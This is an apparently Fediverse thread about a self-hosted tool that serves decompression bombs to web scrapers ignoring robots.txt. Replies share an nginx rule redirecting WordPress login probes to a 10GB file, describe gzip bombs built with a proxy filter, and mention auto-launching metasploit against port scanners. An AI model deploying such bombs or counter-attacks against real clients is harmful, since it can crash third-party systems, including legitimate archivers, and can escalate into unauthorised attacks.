Conversation
Edited 1 year ago

web scrapers have gotten really good at working around passive countermeasures such as captchas, ip blocking and rate limiting

i have yet to see any scraper able to deal with decompression bombs, however

it's time to be downright hostile to companies and techbros' bullshit if you ask me

https://git.arielaw.ar/arisunz/ir34

Edit: if you can't (or don't want to) host your own instance, you can use mine at boom [dot] arielaw [dot] ar

11
13
6

@arisunz I really enjoy hearing ideas for offensive defense :)

Like when I used to have nmap scans and metasploit kick off against a machine that attempted a port scan :D

0
0
0

@arisunz the name of your software is genius. I am in awe. You win so much. 😂

1
0
0

@arisunz evil technique i learned from @sasha

location /wp-login.php {
return 301 "http://speed.hetzner.de/10GB.bin";
}

3
12
4

@arisunz Seriously? Not handling the equivalent of zip bombs in >2020?

0
0
0

@0x2ba22e11 people say naming stuff is one of the hardest things in computer science

I say we just need to up our shitposting levels a bit

0
0
0

@Dracodare (oh, you caught a typo, thanks!)

A decompression* bomb is basically a seemingly small compressed file, such as a zip or gz, that grows to a ridiculously big size when you try to decompress it. A common example is a 10Mb zip file decompressing to a 10 Gb one. Trying to decompress these files crashes the process doing so at best, and brings a system to its knees at worst.

0
0
0

@arisunz >to read more about this technique, google “inflation rule 34”.

0
0
0

@arisunz this is maybe one of my favorite threads of all time

0
0
0

@arisunz
Omg, I love it!

I use this to serve and endless hellscape to unruly bots: https://github.com/yunginnanet/HellPot

0
1
0

@arisunz would this fuck up things like the wayback machine? does it matter?

1
0
0
@arisunz I really really really like this, though I am kind of wondering, wouldn't bots that ignore robots.txt bypass this easily? I've been looking for ways to disallow all scrapers on my sites but those are the ones I'd like to fuck with in particular
1
0
0

@anova that's exactly what this is for though! bots that get to this service and ignore robots.txt get a decompression bomb for lunch

1
0
1
@arisunz Ah, cool, must have missed that! This is absolutely getting introduced in my next project. Thank you for your service to the butlerian jihad.
0
0
1

@arisunz
to read more about this technique, google "inflation rule 34".

>:|

0
0
0

@oreolek @arisunz @sasha okay, I will use this evil technique, but I will make it an html file

0
0
1

@oreolek @arisunz @sasha oh my god this is going in my nginx config lmao

0
0
1

MOVED to @chjara@meow.tuxcrafting.online

okay first bit of sysadmin i'm doing in the last several months
0
0
2

@jet it might, not sure if they're honoring robots.txt (they fucking should)

1
0
0

@arisunz yeah now I think about it I’m sure they do, so it’s a bit moot. I just work daily with people who are doing web scraping for imo good reasons so had a knee jerk moment.

0
0
0

@oreolek @arisunz @sasha if they check the redirect target you can also use https://opensource.zalando.com/skipper/reference/filters/#wrapcontenthex to create a gzip bomb that saves your bandwidth and likely will explode when their http client automatically decompress the „content“.

1
0
0

@sszuecs @oreolek @arisunz @sasha

Zip bombs: Bombing bad actors while saving network resources.

Go gr33n.

0
0
0